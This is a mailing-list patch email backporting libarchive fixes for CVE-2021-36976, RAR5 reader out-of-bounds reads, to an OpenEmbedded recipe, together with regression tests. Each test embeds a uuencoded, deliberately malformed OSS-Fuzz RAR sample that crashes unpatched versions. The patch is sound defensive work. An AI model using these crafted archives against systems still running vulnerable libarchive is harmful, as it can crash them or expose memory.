From patchwork Fri Mar  4 15:04:09 2022
Content-Type: text/plain; charset="utf-8"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
X-Patchwork-Submitter: Steve Sakoman <steve@sakoman.com>
X-Patchwork-Id: 4675
Return-Path: <steve@sakoman.com>
X-Spam-Checker-Version: SpamAssassin 3.4.0 (2014-02-07) on
	aws-us-west-2-korg-lkml-1.web.codeaurora.org
Received: from aws-us-west-2-korg-lkml-1.web.codeaurora.org
 (localhost.localdomain [127.0.0.1])
	by smtp.lore.kernel.org (Postfix) with ESMTP id 00F7CC433F5
	for <webhook@archiver.kernel.org>; Fri,  4 Mar 2022 15:04:49 +0000 (UTC)
Received: from mail-pf1-f172.google.com (mail-pf1-f172.google.com
 [209.85.210.172])
 by mx.groups.io with SMTP id smtpd.web11.7937.1646406288118967185
 for <openembedded-core@lists.openembedded.org>;
 Fri, 04 Mar 2022 07:04:48 -0800
Authentication-Results: mx.groups.io;
 dkim=pass header.i=@sakoman-com.20210112.gappssmtp.com header.s=20210112
 header.b=iLWA0ca5;
 spf=softfail (domain: sakoman.com, ip: 209.85.210.172,
 mailfrom: steve@sakoman.com)
Received: by mail-pf1-f172.google.com with SMTP id d17so7876990pfl.0
        for <openembedded-core@lists.openembedded.org>;
 Fri, 04 Mar 2022 07:04:48 -0800 (PST)
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;
        d=sakoman-com.20210112.gappssmtp.com; s=20210112;
        h=from:to:subject:date:message-id:in-reply-to:references:mime-version
         :content-transfer-encoding;
        bh=c8vDgkDH0OXWjJUOi1/N38mARoS3q5mlQ1Wi5xQwV2c=;
        b=iLWA0ca5Ji70Va6AJrLHsndtY5QP5Jy8yRzlgroL1W3b4CxW+UL7CjTRRyWC7AcoF4
         r19Nc6P9m+mfiwCpJTb+0zcT6UtC2mQjGvlOg7AMvbxuf50mrdim0HxIIf4pPgGCtbiX
         SYQHO6LDO/EZUuPXKMUmP1N00WwDUBwGcp4qMkWAixFZr6owo1Xz2w7xX4fgPiLd9Rlb
         Q3YM+dLnIwhsOE9GTO+XSE9FBz3vpx/oFJw00m6/dinfJXRn2I6zeif2cFrbfC9GL8Ef
         zCezE37YaudEEwJWj53QMUoqwOtQrWLdHInLEf5MHG5jEEtPPbl7vcTZi6l5oabpidf8
         bGrg==
X-Google-DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;
        d=1e100.net; s=20210112;
        h=x-gm-message-state:from:to:subject:date:message-id:in-reply-to
         :references:mime-version:content-transfer-encoding;
        bh=c8vDgkDH0OXWjJUOi1/N38mARoS3q5mlQ1Wi5xQwV2c=;
        b=FdGEWZahzdOplAyLcUZbTACiuEd7RalDTJ4Pf7i39mM79lGmQBxG3zbGdisZdUnZJ5
         dkRA0O68xnZe3RuGem7SKWGa+2vJwP8tVKsSvCenu1J5koLOGsXkoUjGanqpRU6bYus+
         ibpDR/60bryntsFHjgQtC2swbev/vxsYl8oaQSq2qse9SDgOjtgQd5tUAtVpXHPbmgfC
         yEXD3TevC6daNT3RugFyvNpwp4bOTbq8Go4iXQMHLUuNxWNLyO5KMwosE650GPVjclaN
         7q/aUVjEgddHS3HgFO7Dwl4w677D6xQLmECRnE/tPliLNvtXDVnUAMhb8B43w5mxFWB5
         hpLg==
X-Gm-Message-State: AOAM533bi4p/ecMjqH/bzCVA9nBZve30Bmk2lQsnHxeGCLS1dnDhtCn6
	AqaOMpiEDYLtv9jFY+f4e4qHds5HxCDW6MVDXpo=
X-Google-Smtp-Source: 
 ABdhPJz5m57SuCCXfM0sKoAw3Gwvts1qq5k0fVAmBez1yhNMWaKXtfAEVjsjjuFLUmXlaRUh29yhtw==
X-Received: by 2002:a63:6c8a:0:b0:37c:62da:a647 with SMTP id
 h132-20020a636c8a000000b0037c62daa647mr5544832pgc.423.1646406286299;
        Fri, 04 Mar 2022 07:04:46 -0800 (PST)
Received: from hexa.router0800d9.com (dhcp-72-253-6-214.hawaiiantel.net.
 [72.253.6.214])
        by smtp.gmail.com with ESMTPSA id
 f194-20020a6238cb000000b004f6ce898c61sm80400pfa.77.2022.03.04.07.04.44
        for <openembedded-core@lists.openembedded.org>
        (version=TLS1_3 cipher=TLS_AES_256_GCM_SHA384 bits=256/256);
        Fri, 04 Mar 2022 07:04:45 -0800 (PST)
From: Steve Sakoman <steve@sakoman.com>
To: openembedded-core@lists.openembedded.org
Subject: [OE-core][dunfell 01/18] libarchive: Fix for CVE-2021-36976
Date: Fri,  4 Mar 2022 05:04:09 -1000
Message-Id: 
 <6c356aec8dabc08bd98da3106780896dc7b52501.1646406001.git.steve@sakoman.com>
X-Mailer: git-send-email 2.25.1
In-Reply-To: <cover.1646406001.git.steve@sakoman.com>
References: <cover.1646406001.git.steve@sakoman.com>
MIME-Version: 1.0
List-Id: <openembedded-core.lists.openembedded.org>
X-Webhook-Received: from li982-79.members.linode.com [45.33.32.79] by
 aws-us-west-2-korg-lkml-1.web.codeaurora.org with HTTPS for
 <openembedded-core@lists.openembedded.org>; Fri, 04 Mar 2022 15:04:48 -0000
X-Groupsio-URL: 
 https://lists.openembedded.org/g/openembedded-core/message/162720

From: Virendra Thakur <virendra.thakur@kpit.com>

Add patch to fix CVE-2021-36976

CVE-2021-36976 fix are provided by below mentioned pull request.
1) https://github.com/libarchive/libarchive/pull/1491
2) https://github.com/libarchive/libarchive/pull/1492
3) https://github.com/libarchive/libarchive/pull/1493

Signed-off-by: Virendra Thakur <virendra.thakur@kpit.com>
Signed-off-by: virendra thakur <thakur.virendra1810@gmail.com>
Signed-off-by: Steve Sakoman <steve@sakoman.com>
---
 .../libarchive/CVE-2021-36976-1.patch         | 321 ++++++++++++++++++
 .../libarchive/CVE-2021-36976-2.patch         | 121 +++++++
 .../libarchive/CVE-2021-36976-3.patch         |  93 +++++
 .../libarchive/libarchive_3.4.2.bb            |   6 +-
 4 files changed, 540 insertions(+), 1 deletion(-)
 create mode 100644 meta/recipes-extended/libarchive/libarchive/CVE-2021-36976-1.patch
 create mode 100644 meta/recipes-extended/libarchive/libarchive/CVE-2021-36976-2.patch
 create mode 100644 meta/recipes-extended/libarchive/libarchive/CVE-2021-36976-3.patch

diff --git a/meta/recipes-extended/libarchive/libarchive/CVE-2021-36976-1.patch b/meta/recipes-extended/libarchive/libarchive/CVE-2021-36976-1.patch
new file mode 100644
index 0000000000..fca53fc9b6
--- /dev/null
+++ b/meta/recipes-extended/libarchive/libarchive/CVE-2021-36976-1.patch
@@ -0,0 +1,321 @@
+From 05ebb55896d10a9737dad9ae0303f7f45489ba6f Mon Sep 17 00:00:00 2001
+From: Grzegorz Antoniak <ga@anadoxin.org>
+Date: Sat, 13 Feb 2021 09:08:13 +0100
+Subject: [PATCH] RAR5 reader: fixed out of bounds read in some files
+
+Added more range checks in the bit stream reading functions
+(read_bits_16 and read_bits_32) in order to better guard against out of
+memory reads.
+
+This commit contains a test with OSSFuzz sample #30448.
+
+Upstream-Status: Backport [https://git.launchpad.net/ubuntu/+source/libarchive/plain/debian/patches/CVE-2021-36976-1.patch?h=applied/3.4.3-2ubuntu0.1]
+CVE: CVE-2021-36976
+Signed-off-by: Virendra Thakur <virendra.thakur@kpit.com>
+---
+ Makefile.am                                   |   1 +
+ libarchive/archive_read_support_format_rar5.c | 108 ++++++++++--------
+ libarchive/test/test_read_format_rar5.c       |  16 +++
+ ...r5_decode_number_out_of_bounds_read.rar.uu |  10 ++
+ 4 files changed, 89 insertions(+), 46 deletions(-)
+ create mode 100644 libarchive/test/test_read_format_rar5_decode_number_out_of_bounds_read.rar.uu
+
+--- a/Makefile.am
++++ b/Makefile.am
+@@ -883,6 +883,7 @@ libarchive_test_EXTRA_DIST=\
+ 	libarchive/test/test_read_format_rar5_arm_filter_on_window_boundary.rar.uu \
+ 	libarchive/test/test_read_format_rar5_different_winsize_on_merge.rar.uu \
+ 	libarchive/test/test_read_format_rar5_block_size_is_too_small.rar.uu \
++	libarchive/test/test_read_format_rar5_decode_number_out_of_bounds_read.rar.uu \
+ 	libarchive/test/test_read_format_raw.bufr.uu \
+ 	libarchive/test/test_read_format_raw.data.gz.uu \
+ 	libarchive/test/test_read_format_raw.data.Z.uu \
+--- a/libarchive/archive_read_support_format_rar5.c
++++ b/libarchive/archive_read_support_format_rar5.c
+@@ -1012,7 +1012,16 @@ static int read_var_sized(struct archive
+ 	return ret;
+ }
+ 
+-static int read_bits_32(struct rar5* rar, const uint8_t* p, uint32_t* value) {
++static int read_bits_32(struct archive_read* a, struct rar5* rar,
++	const uint8_t* p, uint32_t* value)
++{
++	if(rar->bits.in_addr >= rar->cstate.cur_block_size) {
++		archive_set_error(&a->archive,
++			ARCHIVE_ERRNO_PROGRAMMER,
++			"Premature end of stream during extraction of data (#1)");
++		return ARCHIVE_FATAL;
++	}
++
+ 	uint32_t bits = ((uint32_t) p[rar->bits.in_addr]) << 24;
+ 	bits |= p[rar->bits.in_addr + 1] << 16;
+ 	bits |= p[rar->bits.in_addr + 2] << 8;
+@@ -1023,7 +1032,16 @@ static int read_bits_32(struct rar5* rar
+ 	return ARCHIVE_OK;
+ }
+ 
+-static int read_bits_16(struct rar5* rar, const uint8_t* p, uint16_t* value) {
++static int read_bits_16(struct archive_read* a, struct rar5* rar,
++	const uint8_t* p, uint16_t* value)
++{
++	if(rar->bits.in_addr >= rar->cstate.cur_block_size) {
++		archive_set_error(&a->archive,
++			ARCHIVE_ERRNO_PROGRAMMER,
++			"Premature end of stream during extraction of data (#2)");
++		return ARCHIVE_FATAL;
++	}
++
+ 	int bits = (int) ((uint32_t) p[rar->bits.in_addr]) << 16;
+ 	bits |= (int) p[rar->bits.in_addr + 1] << 8;
+ 	bits |= (int) p[rar->bits.in_addr + 2];
+@@ -1039,8 +1057,8 @@ static void skip_bits(struct rar5* rar,
+ }
+ 
+ /* n = up to 16 */
+-static int read_consume_bits(struct rar5* rar, const uint8_t* p, int n,
+-    int* value)
++static int read_consume_bits(struct archive_read* a, struct rar5* rar,
++	const uint8_t* p, int n, int* value)
+ {
+ 	uint16_t v;
+ 	int ret, num;
+@@ -1051,7 +1069,7 @@ static int read_consume_bits(struct rar5
+ 		return ARCHIVE_FATAL;
+ 	}
+ 
+-	ret = read_bits_16(rar, p, &v);
++	ret = read_bits_16(a, rar, p, &v);
+ 	if(ret != ARCHIVE_OK)
+ 		return ret;
+ 
+@@ -2425,13 +2443,13 @@ static int create_decode_tables(uint8_t*
+ static int decode_number(struct archive_read* a, struct decode_table* table,
+     const uint8_t* p, uint16_t* num)
+ {
+-	int i, bits, dist;
++	int i, bits, dist, ret;
+ 	uint16_t bitfield;
+ 	uint32_t pos;
+ 	struct rar5* rar = get_context(a);
+ 
+-	if(ARCHIVE_OK != read_bits_16(rar, p, &bitfield)) {
+-		return ARCHIVE_EOF;
++	if(ARCHIVE_OK != (ret = read_bits_16(a, rar, p, &bitfield))) {
++		return ret;
+ 	}
+ 
+ 	bitfield &= 0xfffe;
+@@ -2537,14 +2555,6 @@ static int parse_tables(struct archive_r
+ 	for(i = 0; i < HUFF_TABLE_SIZE;) {
+ 		uint16_t num;
+ 
+-		if((rar->bits.in_addr + 6) >= rar->cstate.cur_block_size) {
+-			/* Truncated data, can't continue. */
+-			archive_set_error(&a->archive,
+-			    ARCHIVE_ERRNO_FILE_FORMAT,
+-			    "Truncated data in huffman tables (#2)");
+-			return ARCHIVE_FATAL;
+-		}
+-
+ 		ret = decode_number(a, &rar->cstate.bd, p, &num);
+ 		if(ret != ARCHIVE_OK) {
+ 			archive_set_error(&a->archive,
+@@ -2561,8 +2571,8 @@ static int parse_tables(struct archive_r
+ 			/* 16..17: repeat previous code */
+ 			uint16_t n;
+ 
+-			if(ARCHIVE_OK != read_bits_16(rar, p, &n))
+-				return ARCHIVE_EOF;
++			if(ARCHIVE_OK != (ret = read_bits_16(a, rar, p, &n)))
++				return ret;
+ 
+ 			if(num == 16) {
+ 				n >>= 13;
+@@ -2590,8 +2600,8 @@ static int parse_tables(struct archive_r
+ 			/* other codes: fill with zeroes `n` times */
+ 			uint16_t n;
+ 
+-			if(ARCHIVE_OK != read_bits_16(rar, p, &n))
+-				return ARCHIVE_EOF;
++			if(ARCHIVE_OK != (ret = read_bits_16(a, rar, p, &n)))
++				return ret;
+ 
+ 			if(num == 18) {
+ 				n >>= 13;
+@@ -2707,22 +2717,22 @@ static int parse_block_header(struct arc
+ }
+ 
+ /* Convenience function used during filter processing. */
+-static int parse_filter_data(struct rar5* rar, const uint8_t* p,
+-    uint32_t* filter_data)
++static int parse_filter_data(struct archive_read* a, struct rar5* rar,
++	const uint8_t* p, uint32_t* filter_data)
+ {
+-	int i, bytes;
++	int i, bytes, ret;
+ 	uint32_t data = 0;
+ 
+-	if(ARCHIVE_OK != read_consume_bits(rar, p, 2, &bytes))
+-		return ARCHIVE_EOF;
++	if(ARCHIVE_OK != (ret = read_consume_bits(a, rar, p, 2, &bytes)))
++		return ret;
+ 
+ 	bytes++;
+ 
+ 	for(i = 0; i < bytes; i++) {
+ 		uint16_t byte;
+ 
+-		if(ARCHIVE_OK != read_bits_16(rar, p, &byte)) {
+-			return ARCHIVE_EOF;
++		if(ARCHIVE_OK != (ret = read_bits_16(a, rar, p, &byte))) {
++			return ret;
+ 		}
+ 
+ 		/* Cast to uint32_t will ensure the shift operation will not
+@@ -2765,16 +2775,17 @@ static int parse_filter(struct archive_r
+ 	uint16_t filter_type;
+ 	struct filter_info* filt = NULL;
+ 	struct rar5* rar = get_context(ar);
++	int ret;
+ 
+ 	/* Read the parameters from the input stream. */
+-	if(ARCHIVE_OK != parse_filter_data(rar, p, &block_start))
+-		return ARCHIVE_EOF;
++	if(ARCHIVE_OK != (ret = parse_filter_data(ar, rar, p, &block_start)))
++		return ret;
+ 
+-	if(ARCHIVE_OK != parse_filter_data(rar, p, &block_length))
+-		return ARCHIVE_EOF;
++	if(ARCHIVE_OK != (ret = parse_filter_data(ar, rar, p, &block_length)))
++		return ret;
+ 
+-	if(ARCHIVE_OK != read_bits_16(rar, p, &filter_type))
+-		return ARCHIVE_EOF;
++	if(ARCHIVE_OK != (ret = read_bits_16(ar, rar, p, &filter_type)))
++		return ret;
+ 
+ 	filter_type >>= 13;
+ 	skip_bits(rar, 3);
+@@ -2814,8 +2825,8 @@ static int parse_filter(struct archive_r
+ 	if(filter_type == FILTER_DELTA) {
+ 		int channels;
+ 
+-		if(ARCHIVE_OK != read_consume_bits(rar, p, 5, &channels))
+-			return ARCHIVE_EOF;
++		if(ARCHIVE_OK != (ret = read_consume_bits(ar, rar, p, 5, &channels)))
++			return ret;
+ 
+ 		filt->channels = channels + 1;
+ 	}
+@@ -2823,10 +2834,11 @@ static int parse_filter(struct archive_r
+ 	return ARCHIVE_OK;
+ }
+ 
+-static int decode_code_length(struct rar5* rar, const uint8_t* p,
+-    uint16_t code)
++static int decode_code_length(struct archive_read* a, struct rar5* rar,
++	const uint8_t* p, uint16_t code)
+ {
+ 	int lbits, length = 2;
++
+ 	if(code < 8) {
+ 		lbits = 0;
+ 		length += code;
+@@ -2838,7 +2850,7 @@ static int decode_code_length(struct rar
+ 	if(lbits > 0) {
+ 		int add;
+ 
+-		if(ARCHIVE_OK != read_consume_bits(rar, p, lbits, &add))
++		if(ARCHIVE_OK != read_consume_bits(a, rar, p, lbits, &add))
+ 			return -1;
+ 
+ 		length += add;
+@@ -2933,7 +2945,7 @@ static int do_uncompress_block(struct ar
+ 			continue;
+ 		} else if(num >= 262) {
+ 			uint16_t dist_slot;
+-			int len = decode_code_length(rar, p, num - 262),
++			int len = decode_code_length(a, rar, p, num - 262),
+ 				dbits,
+ 				dist = 1;
+ 
+@@ -2975,12 +2987,12 @@ static int do_uncompress_block(struct ar
+ 					uint16_t low_dist;
+ 
+ 					if(dbits > 4) {
+-						if(ARCHIVE_OK != read_bits_32(
+-						    rar, p, &add)) {
++						if(ARCHIVE_OK != (ret = read_bits_32(
++						    a, rar, p, &add))) {
+ 							/* Return EOF if we
+ 							 * can't read more
+ 							 * data. */
+-							return ARCHIVE_EOF;
++							return ret;
+ 						}
+ 
+ 						skip_bits(rar, dbits - 4);
+@@ -3015,11 +3027,11 @@ static int do_uncompress_block(struct ar
+ 					/* dbits is one of [0,1,2,3] */
+ 					int add;
+ 
+-					if(ARCHIVE_OK != read_consume_bits(rar,
+-					     p, dbits, &add)) {
++					if(ARCHIVE_OK != (ret = read_consume_bits(a, rar,
++					     p, dbits, &add))) {
+ 						/* Return EOF if we can't read
+ 						 * more data. */
+-						return ARCHIVE_EOF;
++						return ret;
+ 					}
+ 
+ 					dist += add;
+@@ -3076,7 +3088,11 @@ static int do_uncompress_block(struct ar
+ 				return ARCHIVE_FATAL;
+ 			}
+ 
+-			len = decode_code_length(rar, p, len_slot);
++			len = decode_code_length(a, rar, p, len_slot);
++			if (len == -1) {
++				return ARCHIVE_FATAL;
++			}
++
+ 			rar->cstate.last_len = len;
+ 
+ 			if(ARCHIVE_OK != copy_string(a, len, dist))
+--- a/libarchive/test/test_read_format_rar5.c
++++ b/libarchive/test/test_read_format_rar5.c
+@@ -1271,3 +1271,20 @@ DEFINE_TEST(test_read_format_rar5_block_
+ 
+ 	EPILOGUE();
+ }
++
++DEFINE_TEST(test_read_format_rar5_decode_number_out_of_bounds_read)
++{
++	/* oss fuzz 30448 */
++
++	char buf[4096];
++	PROLOGUE("test_read_format_rar5_decode_number_out_of_bounds_read.rar");
++
++	/* Return codes of those calls are ignored, because this sample file
++	 * is invalid. However, the unpacker shouldn't produce any SIGSEGV
++	 * errors during processing. */
++
++	(void) archive_read_next_header(a, &ae);
++	while(0 < archive_read_data(a, buf, sizeof(buf))) {}
++
++	EPILOGUE();
++}
+--- /dev/null
++++ b/libarchive/test/test_read_format_rar5_decode_number_out_of_bounds_read.rar.uu
+@@ -0,0 +1,10 @@
++begin 644 test_read_format_rar5_decode_number_out_of_bounds_read.rar
++M4F%R(1H'`0!3@"KT`P+G(@(0("`@@`L!!"`@("`@(($D_[BJ2"!::7!)210V
++M+0#ZF#)Q!`+>YPW_("`@("``_R````````````````````````````!__P``
++M``````!T72`@/EW_(/\@("`@("`@("`@("`@("`@("`@("`@("`@(/\@("`@
++M("`@("#_("`@("`@("`@("`@("`@("`@("`@("`@("#_("`@("`@("`@_R`@
++M("`@("`@("`@("`@("`@("`@("`@("`@_R`@("`@("`@(/\@("`@("`@("`@
++M("`@("`@("`@("`@("`@(/\@("`@("`@("#_("`@("`@("`@("`@("`@("`@
++E("`@("`@("#_("`@("`@("`@_R`@("`@("`@("`@("`@("`@(```
++`
++end
diff --git a/meta/recipes-extended/libarchive/libarchive/CVE-2021-36976-2.patch b/meta/recipes-extended/libarchive/libarchive/CVE-2021-36976-2.patch
new file mode 100644
index 0000000000..b5da44ec7b
--- /dev/null
+++ b/meta/recipes-extended/libarchive/libarchive/CVE-2021-36976-2.patch
@@ -0,0 +1,121 @@
+From 17f4e83c0f0fc3bacf4b2bbacb01f987bb5aff5f Mon Sep 17 00:00:00 2001
+From: Grzegorz Antoniak <ga@anadoxin.org>
+Date: Fri, 12 Feb 2021 20:18:31 +0100
+Subject: [PATCH] RAR5 reader: fix invalid memory access in some files
+
+RAR5 reader uses several variables to manage the window buffer during
+extraction: the buffer itself (`window_buf`), the current size of the
+window buffer (`window_size`), and a helper variable (`window_mask`)
+that is used to constrain read and write offsets to the window buffer.
+
+Some specially crafted files can force the unpacker to update the
+`window_mask` variable to a value that is out of sync with current
+buffer size. If the `window_mask` will be bigger than the actual buffer
+size, then an invalid access operation can happen (SIGSEGV).
+
+This commit ensures that if the `window_size` and `window_mask` will be
+changed, the window buffer will be reallocated to the proper size, so no
+invalid memory operation should be possible.
+
+This commit contains a test file from OSSFuzz #30442.
+
+Upstream-Status: Backport [https://git.launchpad.net/ubuntu/+source/libarchive/plain/debian/patches/CVE-2021-36976-2.patch?h=applied/3.4.3-2ubuntu0.1]
+CVE: CVE-2021-36976
+Signed-off-by: Virendra Thakur <virendra.thakur@kpit.com>
+
+---
+ Makefile.am                                   |  1 +
+ libarchive/archive_read_support_format_rar5.c | 27 ++++++++++++++-----
+ libarchive/test/test_read_format_rar5.c       | 17 ++++++++++++
+ ...mat_rar5_window_buf_and_size_desync.rar.uu | 11 ++++++++
+ 4 files changed, 50 insertions(+), 6 deletions(-)
+ create mode 100644 libarchive/test/test_read_format_rar5_window_buf_and_size_desync.rar.uu
+
+--- a/Makefile.am
++++ b/Makefile.am
+@@ -884,6 +884,7 @@ libarchive_test_EXTRA_DIST=\
+ 	libarchive/test/test_read_format_rar5_different_winsize_on_merge.rar.uu \
+ 	libarchive/test/test_read_format_rar5_block_size_is_too_small.rar.uu \
+ 	libarchive/test/test_read_format_rar5_decode_number_out_of_bounds_read.rar.uu \
++	libarchive/test/test_read_format_rar5_window_buf_and_size_desync.rar.uu \
+ 	libarchive/test/test_read_format_raw.bufr.uu \
+ 	libarchive/test/test_read_format_raw.data.gz.uu \
+ 	libarchive/test/test_read_format_raw.data.Z.uu \
+--- a/libarchive/archive_read_support_format_rar5.c
++++ b/libarchive/archive_read_support_format_rar5.c
+@@ -1730,14 +1730,29 @@ static int process_head_file(struct arch
+ 		}
+ 	}
+ 
+-	/* If we're currently switching volumes, ignore the new definition of
+-	 * window_size. */
+-	if(rar->cstate.switch_multivolume == 0) {
+-		/* Values up to 64M should fit into ssize_t on every
+-		 * architecture. */
+-		rar->cstate.window_size = (ssize_t) window_size;
++	if(rar->cstate.window_size < (ssize_t) window_size &&
++	    rar->cstate.window_buf)
++	{
++		/* If window_buf has been allocated before, reallocate it, so
++		 * that its size will match new window_size. */
++
++		uint8_t* new_window_buf =
++			realloc(rar->cstate.window_buf, window_size);
++
++		if(!new_window_buf) {
++			archive_set_error(&a->archive, ARCHIVE_ERRNO_PROGRAMMER,
++				"Not enough memory when trying to realloc the window "
++				"buffer.");
++			return ARCHIVE_FATAL;
++		}
++
++		rar->cstate.window_buf = new_window_buf;
+ 	}
+ 
++	/* Values up to 64M should fit into ssize_t on every
++	 * architecture. */
++	rar->cstate.window_size = (ssize_t) window_size;
++
+ 	if(rar->file.solid > 0 && rar->file.solid_window_size == 0) {
+ 		/* Solid files have to have the same window_size across
+ 		   whole archive. Remember the window_size parameter
+--- a/libarchive/test/test_read_format_rar5.c
++++ b/libarchive/test/test_read_format_rar5.c
+@@ -1206,6 +1206,23 @@ DEFINE_TEST(test_read_format_rar5_differ
+ 	EPILOGUE();
+ }
+ 
++DEFINE_TEST(test_read_format_rar5_window_buf_and_size_desync)
++{
++	/* oss fuzz 30442 */
++
++	char buf[4096];
++	PROLOGUE("test_read_format_rar5_window_buf_and_size_desync.rar");
++
++	/* Return codes of those calls are ignored, because this sample file
++	 * is invalid. However, the unpacker shouldn't produce any SIGSEGV
++	 * errors during processing. */
++
++	(void) archive_read_next_header(a, &ae);
++	while(0 < archive_read_data(a, buf, 46)) {}
++
++	EPILOGUE();
++}
++
+ DEFINE_TEST(test_read_format_rar5_arm_filter_on_window_boundary)
+ {
+ 	char buf[4096];
+--- /dev/null
++++ b/libarchive/test/test_read_format_rar5_window_buf_and_size_desync.rar.uu
+@@ -0,0 +1,11 @@
++begin 644 test_read_format_rar5_window_buf_and_size_desync.rar
++M4F%R(1H'`0`]/-[E`@$`_P$`1#[Z5P("`PL``BXB"?\`!(@B@0`)6.-AF?_1
++M^0DI&0GG(F%R(0<:)`!3@"KT`P+G(@O_X[\``#&``(?!!0$$[:L``$.M*E)A
++M<B$`O<\>P0";/P1%``A*2DI*2DYQ<6TN9'%*2DI*2DI*``!D<F--``````"Z
++MNC*ZNKJZNFYO=&%I;+JZNKJZNKJZOKJZ.KJZNKJZNKKZU@4%````0$!`0$!`
++M0$!`0$!`0$!`0$#_________/T#`0$!`0$!`-UM`0$!`0$!`0$!`0$!`0$!`
++M0$!`0'!,J+:O!IZ-WN4'@`!3*F0`````````````````````````````````
++M``````````````#T`P)287(A&@<!`%.`*O0#`N<B`_,F@`'[__\``(`4`01S
++J'`/H/O\H@?\D`#O9GIZ>GN<B"_]%``(``&1RGIZ>GIZ>8_^>GE/_``!.
++`
++end
diff --git a/meta/recipes-extended/libarchive/libarchive/CVE-2021-36976-3.patch b/meta/recipes-extended/libarchive/libarchive/CVE-2021-36976-3.patch
new file mode 100644
index 0000000000..0e1549f229
--- /dev/null
+++ b/meta/recipes-extended/libarchive/libarchive/CVE-2021-36976-3.patch
@@ -0,0 +1,93 @@
+From 313bcd7ac547f7cc25945831f63507420c0874d7 Mon Sep 17 00:00:00 2001
+From: Grzegorz Antoniak <ga@anadoxin.org>
+Date: Sat, 13 Feb 2021 10:13:22 +0100
+Subject: [PATCH] RAR5 reader: add more checks for invalid extraction
+ parameters
+
+Some specially crafted files declare invalid extraction parameters that
+can confuse the RAR5 reader.
+
+One of the arguments is the declared window size parameter that the
+archive file can declare for each file stored in the archive. Some
+crafted files declare window size equal to 0, which is clearly wrong.
+
+This commit adds additional safety checks decreasing the tolerance of
+the RAR5 format.
+
+This commit also contains OSSFuzz sample #30459.
+---
+ Makefile.am                                   |  1 +
+ libarchive/archive_read_support_format_rar5.c | 10 ++++++++++
+ libarchive/test/test_read_format_rar5.c       | 19 +++++++++++++++++++
+ ...t_rar5_bad_window_sz_in_mltarc_file.rar.uu |  7 +++++++
+ 4 files changed, 37 insertions(+)
+ create mode 100644 libarchive/test/test_read_format_rar5_bad_window_sz_in_mltarc_file.rar.uu
+
+Upstream-Status: Backport [https://github.com/libarchive/libarchive/pull/1493/commits/313bcd7ac547f7cc25945831f63507420c0874d7]
+CVE: CVE-2021-36976
+Signed-off-by: Virendra Thakur <virendra.thakur@kpit.com>
+
+--- libarchive-3.4.2.orig/Makefile.am
++++ libarchive-3.4.2/Makefile.am
+@@ -882,6 +882,7 @@ libarchive_test_EXTRA_DIST=\
+ 	libarchive/test/test_read_format_rar5_block_size_is_too_small.rar.uu \
+ 	libarchive/test/test_read_format_rar5_decode_number_out_of_bounds_read.rar.uu \
+ 	libarchive/test/test_read_format_rar5_window_buf_and_size_desync.rar.uu \
++	libarchive/test/test_read_format_rar5_bad_window_sz_in_mltarc_file.rar.uu \
+ 	libarchive/test/test_read_format_raw.bufr.uu \
+ 	libarchive/test/test_read_format_raw.data.gz.uu \
+ 	libarchive/test/test_read_format_raw.data.Z.uu \
+--- libarchive-3.4.2.orig/libarchive/archive_read_support_format_rar5.c
++++ libarchive-3.4.2/libarchive/archive_read_support_format_rar5.c
+@@ -3637,6 +3637,16 @@ static int do_uncompress_file(struct arc
+ 		rar->cstate.initialized = 1;
+ 	}
+ 
++	/* Don't allow extraction if window_size is invalid. */
++	if(rar->cstate.window_size == 0) {
++		archive_set_error(&a->archive,
++			ARCHIVE_ERRNO_FILE_FORMAT,
++			"Invalid window size declaration in this file");
++
++		/* This should never happen in valid files. */
++		return ARCHIVE_FATAL;
++	}
++
+ 	if(rar->cstate.all_filters_applied == 1) {
+ 		/* We use while(1) here, but standard case allows for just 1
+ 		 * iteration. The loop will iterate if process_block() didn't
+--- libarchive-3.4.2.orig/libarchive/test/test_read_format_rar5.c
++++ libarchive-3.4.2/libarchive/test/test_read_format_rar5.c
+@@ -1305,3 +1305,22 @@ DEFINE_TEST(test_read_format_rar5_decode
+ 
+ 	EPILOGUE();
+ }
++
++DEFINE_TEST(test_read_format_rar5_bad_window_size_in_multiarchive_file)
++{
++	/* oss fuzz 30459 */
++
++	char buf[4096];
++	PROLOGUE("test_read_format_rar5_bad_window_sz_in_mltarc_file.rar");
++
++	/* This file is damaged, so those functions should return failure.
++	 * Additionally, SIGSEGV shouldn't be raised during execution
++	 * of those functions. */
++
++	(void) archive_read_next_header(a, &ae);
++	while(0 < archive_read_data(a, buf, sizeof(buf))) {}
++	(void) archive_read_next_header(a, &ae);
++	while(0 < archive_read_data(a, buf, sizeof(buf))) {}
++
++	EPILOGUE();
++}
+--- /dev/null
++++ libarchive-3.4.2/libarchive/test/test_read_format_rar5_bad_window_sz_in_mltarc_file.rar.uu
+@@ -0,0 +1,7 @@
++begin 644 test_read_format_rar5_bad_window_size_in_multiarchive_file.rar
++M4F%R(1H'`0`]/-[E`@$`_R`@1#[Z5P("`PL`("`@@"(`"?\@("#___\@("`@
++M("`@("`@("`@4X`J]`,"YR(#$($@("`@``$@("`@@<L0("`@("`@("`@("`@
++M("`@(""LCTJA`P$%`B`@`2!3@"KT`P+G(@,@("`@_P,!!B`@(/___R`@(('+
++5$"`OX2`@[.SL[.S_("`@("`@("`@
++`
++end
diff --git a/meta/recipes-extended/libarchive/libarchive_3.4.2.bb b/meta/recipes-extended/libarchive/libarchive_3.4.2.bb
index 0ab40fc096..b7426a1be8 100644
--- a/meta/recipes-extended/libarchive/libarchive_3.4.2.bb
+++ b/meta/recipes-extended/libarchive/libarchive_3.4.2.bb
@@ -32,7 +32,11 @@ PACKAGECONFIG[mbedtls] = "--with-mbedtls,--without-mbedtls,mbedtls,"
 
 EXTRA_OECONF += "--enable-largefile"
 
-SRC_URI = "http://libarchive.org/downloads/libarchive-${PV}.tar.gz"
+SRC_URI = "http://libarchive.org/downloads/libarchive-${PV}.tar.gz \
+           file://CVE-2021-36976-1.patch \
+           file://CVE-2021-36976-2.patch \
+           file://CVE-2021-36976-3.patch \
+"
 
 SRC_URI[md5sum] = "d953ed6b47694dadf0e6042f8f9ff451"
 SRC_URI[sha256sum] = "b60d58d12632ecf1e8fad7316dc82c6b9738a35625746b47ecdcaf4aed176176"

From patchwork Fri Mar  4 15:04:10 2022
Content-Type: text/plain; charset="utf-8"
MIME-Version: 1.0
Content-Transfer-Encoding: 8bit
X-Patchwork-Submitter: Steve Sakoman <steve@sakoman.com>
X-Patchwork-Id: 14173
